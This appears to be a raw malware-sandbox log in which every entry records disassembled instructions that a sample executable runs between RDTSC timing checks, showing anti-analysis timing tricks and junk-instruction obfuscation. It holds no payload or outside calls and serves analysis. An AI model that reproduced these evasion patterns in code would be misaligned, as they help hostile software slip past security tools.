Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118B9F8 second address: 118BA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007EFFE92369DEh 0x0000000b jmp 00007EFFE92369D6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189A70 second address: 1189A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189A74 second address: 1189A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFFE92369C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007EFFE92369CAh 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007EFFE92369C6h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189BB8 second address: 1189BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189BBC second address: 1189BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189BC2 second address: 1189BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFFE8794FADh 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189D08 second address: 1189D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189D0C second address: 1189D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189D12 second address: 1189D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007EFFE92369C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189D20 second address: 1189D2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jne 00007EFFE8794FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189E7A second address: 1189EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFFE92369CAh 0x0000000b je 00007EFFE92369C6h 0x00000011 jmp 00007EFFE92369CBh 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189EA2 second address: 1189EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1189EA8 second address: 1189F0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007EFFE92369CCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007EFFE92369D3h 0x00000014 ja 00007EFFE92369C6h 0x0000001a jnc 00007EFFE92369C6h 0x00000020 jmp 00007EFFE92369D9h 0x00000025 popad 0x00000026 jmp 00007EFFE92369D7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118A609 second address: 118A611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115494C second address: 1154952 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1154952 second address: 1154960 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE8794FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1154960 second address: 1154966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118B45D second address: 118B461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118B5DC second address: 118B5E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118E05C second address: 118E080 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007EFFE8794FB0h 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118E080 second address: 118E08A instructions: 0x00000000 rdtsc 0x00000002 je 00007EFFE92369C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118E08A second address: 118E0A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFFE8794FAEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115E898 second address: 115E89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115E89C second address: 115E8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115E8A0 second address: 115E8CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jg 00007EFFE92369C6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007EFFE92369D5h 0x00000019 ja 00007EFFE92369C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115E8CF second address: 115E8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 115E8D3 second address: 115E8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007EFFE92369C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 118FE74 second address: 118FE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11903BA second address: 1190447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369D9h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007EFFE92369D4h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push esi 0x00000016 jng 00007EFFE92369D1h 0x0000001c jmp 00007EFFE92369CBh 0x00000021 pop esi 0x00000022 mov eax, dword ptr [eax] 0x00000024 pushad 0x00000025 push ebx 0x00000026 ja 00007EFFE92369C6h 0x0000002c pop ebx 0x0000002d jmp 00007EFFE92369D7h 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007EFFE92369D9h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1190447 second address: 119044D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1190517 second address: 119054E instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFFE92369C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007EFFE92369D1h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jmp 00007EFFE92369D1h 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119054E second address: 119058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007EFFE8794FA6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007EFFE8794FB5h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007EFFE8794FB3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119058E second address: 1190594 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119070F second address: 1190717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1190717 second address: 119072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFFE92369CBh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119593E second address: 1195948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007EFFE8794FA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1195948 second address: 119594C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11954E8 second address: 11954F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11954F0 second address: 11954F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11954F6 second address: 1195523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007EFFE8794FBCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007EFFE8794FBFh 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11957E6 second address: 11957EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199F83 second address: 1199F88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 1199FDE second address: 119A008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 70E8B0C5h 0x0000000c and esi, 29924656h 0x00000012 push BD8DF05Fh 0x00000017 pushad 0x00000018 jmp 00007EFFE92369CEh 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119ABEB second address: 119ABF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119AD98 second address: 119AD9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119AD9C second address: 119ADA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119B062 second address: 119B075 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFFE92369C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119B075 second address: 119B079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119B079 second address: 119B07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119B131 second address: 119B135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119B609 second address: 119B679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007EFFE92369D7h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007EFFE92369C8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 jbe 00007EFFE92369C6h 0x0000002e push 00000000h 0x00000030 jbe 00007EFFE92369D2h 0x00000036 jl 00007EFFE92369CCh 0x0000003c mov dword ptr [ebp+122D188Eh], eax 0x00000042 push 00000000h 0x00000044 adc di, 7991h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jns 00007EFFE92369CCh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119E4CE second address: 119E4DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119E251 second address: 119E256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119E256 second address: 119E260 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFFE8794FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119EF19 second address: 119EF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119EF1D second address: 119EF23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 119EF23 second address: 119EF28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A0436 second address: 11A04B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFE8794FABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3192h], edx 0x00000010 xor di, FFF0h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007EFFE8794FA8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 or dword ptr [ebp+122D35D3h], eax 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007EFFE8794FA8h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007EFFE8794FB9h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A018B second address: 11A01A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFFE92369CEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A04B8 second address: 11A04C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007EFFE8794FA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A01A0 second address: 11A01B5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFFE92369C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007EFFE92369C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A2B2C second address: 11A2B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A3B7D second address: 11A3B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A3B81 second address: 11A3B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A3B85 second address: 11A3B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A3B8E second address: 11A3BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007EFFE8794FA8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007EFFE8794FA8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d mov edi, dword ptr [ebp+122D3867h] 0x00000043 push 00000000h 0x00000045 mov dword ptr [ebp+122D2985h], esi 0x0000004b xchg eax, esi 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A5BDB second address: 11A5C27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007EFFE92369C8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 or ebx, 76FEE072h 0x00000028 push 00000000h 0x0000002a mov bx, si 0x0000002d push 00000000h 0x0000002f jmp 00007EFFE92369D0h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jg 00007EFFE92369C6h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A6BFB second address: 11A6C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A6C01 second address: 11A6C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A6C05 second address: 11A6C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A5DDE second address: 11A5DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFE92369CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A5DED second address: 11A5DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A7F54 second address: 11A7F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A9C7C second address: 11A9CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007EFFE8794FB4h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFE8794FB9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A9CB6 second address: 11A9CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A9CBA second address: 11A9CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A9CC0 second address: 11A9CC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11A9CC5 second address: 11A9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007EFFE8794FB5h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007EFFE8794FA8h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx edi, cx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007EFFE8794FA8h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000018h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 jmp 00007EFFE8794FB2h 0x0000004d push eax 0x0000004e push ebx 0x0000004f pushad 0x00000050 push ebx 0x00000051 pop ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\L0erlgyZ6f.exe	RDTSC instruction interceptor: First address: 11ACC41 second address: 11ACC4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFFE92369C6h 0x0000000a rdtsc
